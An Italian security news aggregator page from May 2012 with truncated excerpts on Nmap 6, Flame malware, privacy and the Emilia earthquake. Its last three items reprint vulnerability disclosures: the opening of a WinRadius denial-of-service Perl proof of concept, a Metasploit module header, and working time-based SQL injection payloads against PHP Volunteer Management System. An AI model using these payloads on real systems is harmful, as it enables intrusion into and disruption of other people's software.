Nmap 6

30 maggio 2012 - Fonte: http://www.mondounix.com

nmap

E' stata rilasciata la nuova versione del port scanning open source e gratuito Nmap v6 .

Changelog ufficiale :

1. NSE Enhanced
The Nmap Scripting Engine (NSE) has exploded in popularity and capabilities. This modular system allows users to automate a wide variety of networking tasks, from querying network applications for configuration information to vulnerability detection and advanced host discovery. The script count has grown from 59 in Nmap 5 to 348 in Nmap 6, and all of them are documented and categorized in our NSE Documentation Portal. The underlying NSE infrastructure has improved dramatically as well.

2. Better Web Scanning
As the Internet has grown more web-centric,...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , , , ,

Tim Cook dichiara che raddoppieranno la sicurezza negli stabilimenti Apple

30 maggio 2012 - Fonte: http://www.applezein.net/wordpress

Durante la D10 Conference, Tim Cook ha dichiarato che tra le tante novità all’interno di Apple, l’azienda di Cupertino raddoppierà la sicurezza cercando di evitare che trapelino notizie su nuovi prodotti e servizi.

Ecco le parole ti Tim Cook:

“Stiamo per raddoppiare la nostra attenzione alla segretezza. Sono molo serio e teniamo tanto a questo aspetto

Dalle parole di Tim,...

Leggi il seguito »

Nessun commento »

Inserito in , , ,

I Migliori Antivirus Gratis in Italiano da Scaricare del 2012

30 maggio 2012 - Fonte: http://www.tuttotech.com
Ecco a voi la lista dei migliori antivirus gratis in italiano per il 2012, vi proponiamo una serie di software tra cui scegliere in base alle vostro esigenze. Da tenere in considerazione per la scelta del miglior antivirus per il proprio pc c’è il fattore requisiti di sistema; molti dei software in circolazione girano ormai [...]...

Leggi il seguito »

Nessun commento »

Inserito in , , ,

“Flame”, allarme super-virus

30 maggio 2012 - Fonte: http://computermente.blogspot.com/
un minaccia senza precedenti

Individuato un malware di potenza mai riscontrata finora.

Progettato per lo spionaggio industriale, è in grado di infettare macchine in molteplici modalità, e segue gli attacchi di Duqu e Stuxnet.

L'esperto: "Una nuova fase della guerra informatica"

L'allarme arriva da Kaspersky Lab, produttori di antivirus, che annunciano la scoperta di un programma nocivo altamente sofisticato, ampiamente utilizzato come arma informatica per compiere attacchi in diversi paesi....

Leggi il seguito »

Nessun commento »

Inserito in , ,

Kaspersky Labs: individuato “Flame” un nuovo e pericolosissimo malware

30 maggio 2012 - Fonte: http://benzene4ever.blogspot.com/
La nota software house di sicurezza Kasprsky ha individuato un nuovo e pericolosissimo malware chiamato Worm.Win32.Flame alias “Flame”. Tale malware è stato fino ad oggi utilizzato per effettuare...

Clicca sul titolo per continuare a leggere il post su Benzene 4 Ever......

Leggi il seguito »

Nessun commento »

Inserito in , , ,

Quanto è privata la tua privacy?

29 maggio 2012 - Fonte: http://pinobruno.globalist.it
Può il bove dire cornuto al ciuccio? Google ci prova, con la sua campagna Buono a sapersi. Ovvero, tutto quello che avresti voluto conoscere su sicurezza, gestione e salvaguardia dei dati personali online. Iniziativa lodevole, non fosse altro per far sapere agli utenti quanto e cosa rischiano andandosene bellamente in giro per il web senza Continue reading → Related posts:
  1. Privacy: Apple e Google sulla graticola ma Facebook non scherza
  2. href="http://pinobruno.globalist.it/...

    Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , ,

Terremoto in Emilia: togliete la password dal router Wi Fi, ecco come fare

29 maggio 2012 - Fonte: http://www.tissy.it

Il terremoto in Emilia ha messo in ginocchio il nord Italia. Il comune di Bologna ha deciso di aprire a tutti il sistema Wi-Fi di collegamento alla rete internet municipale per facilitare le comunicazioni, ostacolate dal tilt dei collegamenti telefonici intasati. Parallelamente è stato lanciato un appello dalla Protezione Civile a tutti i cittadini delle zone colpite perché facciano la stessa cosa.

Ecco come fare:

-Digitate sul browser l’indirizzo ip del vostro router,...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , ,

WinRadius Server Denial Of Service Vulnerability

29 maggio 2012 - Fonte: http://www.mondounix.com

Bug Description :
WinRadius is a standard RADIUS server for network authentication, accounting. It's easy to use, and can be used for
telecommunication accounting platform, PPP authentication, accounting server. It support PPP, PPPoE, PPTP, VPN, VoIP,
ADSL, Cable Modem, CDMA, GSM, GPRS, WLAN(802.1x), etc.
WinRadius server would bind udp port 1812 and 1813, but it does not validate the password option size leading to a
Denial Of Service flaw while sending more than 240 characters to it.

Proof Of Concept :
-----------------------------------------------------------

#!/usr/bin/perl
use...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , ,

ispVM System XCF File Handling Overflow

29 maggio 2012 - Fonte: http://www.mondounix.com 
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , ,

PHP Volunteer Management System v 1.0.2 multiple SQLi Vulnerabilities

29 maggio 2012 - Fonte: http://www.mondounix.com 
# Title: PHP Volunteer Management System v 1.0.2 multiple SQLi Vulnerabilities
# Version: 1.0.2
# Author/Found by: loneferret
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Other vulnerabilities: http://www.exploit-db.com/exploits/18941/
 
# Date found: May 28th 2012
# Tested on: Ubuntu Server 8.04 / PHP Version 5.2.4-2ubuntu5.23
 
# Vulnerability:
# Due to improper sanitation, many of the parameters are injectable,
# some need to be authenticated, others not.
 
# As always have fun...
 
PoC:
 
Page: index.php
Parameter: ?p=
Method: GET
Payload: /?p=dashboard' and sleep(5) and '1'='1
Payload: /?p=login' and sleep(5) and '1'='1
 
Other affected parameters can be found in the message...

Leggi il seguito »

Nessun commento »

Inserito in , , , , , , , , , , , , , , , ,